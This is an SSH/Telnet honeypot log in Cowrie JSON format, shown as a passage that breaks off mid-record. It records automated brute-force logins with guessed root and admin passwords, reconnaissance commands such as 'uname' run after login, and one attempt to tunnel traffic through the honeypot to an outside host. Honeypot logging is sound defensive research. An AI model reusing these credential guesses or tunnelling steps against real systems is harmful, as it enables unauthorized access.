{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:29:01.955249Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"102030","message":"login attempt [root/102030] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:29:03.536043Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:29:04.141610Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T18:29:04.142329Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:29:04.433694Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:29:04.434879Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60978,"dst_ip":"1.2.3.4","dst_port":22,"session":"76a61b5778ed","protocol":"ssh","message":"New connection: 212.227.235.229:60978 (1.2.3.4:22) [session: 76a61b5778ed]","sensor":"my-vps","timestamp":"2025-08-28T18:29:36.992477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:29:37.106566Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:29:37.203606Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:29:38.305140Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:29:39.026466Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:29:39.027219Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:29:39.419691Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:29:39.420879Z","src_ip":"212.227.235.229","session":"76a61b5778ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45908,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff323824b19","protocol":"ssh","message":"New connection: 212.227.235.229:45908 (1.2.3.4:22) [session: aff323824b19]","sensor":"my-vps","timestamp":"2025-08-28T18:34:11.376137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:34:11.377058Z","src_ip":"212.227.235.229","session":"aff323824b19"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:34:11.484940Z","src_ip":"212.227.235.229","session":"aff323824b19"}
{"eventid":"cowrie.login.failed","username":"sol","password":"12","message":"login attempt [sol/12] failed","sensor":"my-vps","timestamp":"2025-08-28T18:34:11.812330Z","src_ip":"212.227.235.229","session":"aff323824b19"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:34:12.922740Z","src_ip":"212.227.235.229","session":"aff323824b19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9408,"dst_ip":"1.2.3.4","dst_port":22,"session":"db885b3e7f32","protocol":"ssh","message":"New connection: 212.227.125.160:9408 (1.2.3.4:22) [session: db885b3e7f32]","sensor":"my-vps","timestamp":"2025-08-28T18:34:29.619675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:34:29.620591Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:34:29.679867Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28021993","message":"login attempt [admin/28021993] failed","sensor":"my-vps","timestamp":"2025-08-28T18:34:30.000821Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27121987","message":"login attempt [admin/27121987] failed","sensor":"my-vps","timestamp":"2025-08-28T18:34:31.062863Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27121984","message":"login attempt [admin/27121984] failed","sensor":"my-vps","timestamp":"2025-08-28T18:34:32.124980Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27101993","message":"login attempt [admin/27101993] failed","sensor":"my-vps","timestamp":"2025-08-28T18:34:33.187330Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27081983","message":"login attempt [admin/27081983] failed","sensor":"my-vps","timestamp":"2025-08-28T18:34:34.249085Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:34:35.310533Z","src_ip":"212.227.125.160","session":"db885b3e7f32"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55348,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c6b9251d60e","protocol":"ssh","message":"New connection: 217.72.205.35:55348 (1.2.3.4:22) [session: 4c6b9251d60e]","sensor":"my-vps","timestamp":"2025-08-28T18:34:41.463233Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:34:41.464327Z","src_ip":"217.72.205.35","session":"4c6b9251d60e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47722,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1e6242f939d","protocol":"ssh","message":"New connection: 212.227.125.160:47722 (1.2.3.4:22) [session: d1e6242f939d]","sensor":"my-vps","timestamp":"2025-08-28T18:34:44.602484Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:34:44.604557Z","src_ip":"212.227.125.160","session":"d1e6242f939d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47995,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3cd87457506","protocol":"ssh","message":"New connection: 212.227.125.160:47995 (1.2.3.4:22) [session: a3cd87457506]","sensor":"my-vps","timestamp":"2025-08-28T18:34:44.715351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:34:44.716672Z","src_ip":"212.227.125.160","session":"a3cd87457506"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T18:34:44.830833Z","src_ip":"212.227.125.160","session":"a3cd87457506"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:34:45.172883Z","src_ip":"212.227.125.160","session":"a3cd87457506"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T18:34:45.287367Z","session":"a3cd87457506"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38024,"dst_ip":"1.2.3.4","dst_port":22,"session":"39aea46ecf1d","protocol":"ssh","message":"New connection: 212.227.235.229:38024 (1.2.3.4:22) [session: 39aea46ecf1d]","sensor":"my-vps","timestamp":"2025-08-28T18:35:08.233296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:35:08.234236Z","src_ip":"212.227.235.229","session":"39aea46ecf1d"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T18:35:08.319128Z","src_ip":"212.227.235.229","session":"39aea46ecf1d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:35:08.406258Z","src_ip":"212.227.235.229","session":"39aea46ecf1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36441,"dst_ip":"1.2.3.4","dst_port":23,"session":"2396850ee7fb","protocol":"telnet","message":"New connection: 212.227.235.229:36441 (1.2.3.4:23) [session: 2396850ee7fb]","sensor":"my-vps","timestamp":"2025-08-28T18:35:36.733642Z"}
{"eventid":"cowrie.session.connect","src_ip":"147.139.164.196","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"2407af668e8f","protocol":"ssh","message":"New connection: 147.139.164.196:6103 (1.2.3.4:22) [session: 2407af668e8f]","sensor":"my-vps","timestamp":"2025-08-28T18:35:37.153468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T18:35:37.367083Z","src_ip":"147.139.164.196","session":"2407af668e8f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T18:35:37.597368Z","src_ip":"147.139.164.196","session":"2407af668e8f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T18:35:39.799470Z","src_ip":"147.139.164.196","session":"2407af668e8f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:35:39.800880Z","src_ip":"147.139.164.196","session":"2407af668e8f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:35:54.715768Z","src_ip":"212.227.125.160","session":"a3cd87457506"}
{"eventid":"cowrie.session.closed","duration":31.333391904830933,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:36:08.066965Z","src_ip":"212.227.235.229","session":"2396850ee7fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46844,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a2df793b39e","protocol":"ssh","message":"New connection: 212.227.235.229:46844 (1.2.3.4:22) [session: 4a2df793b39e]","sensor":"my-vps","timestamp":"2025-08-28T18:36:48.789190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:36:48.789981Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 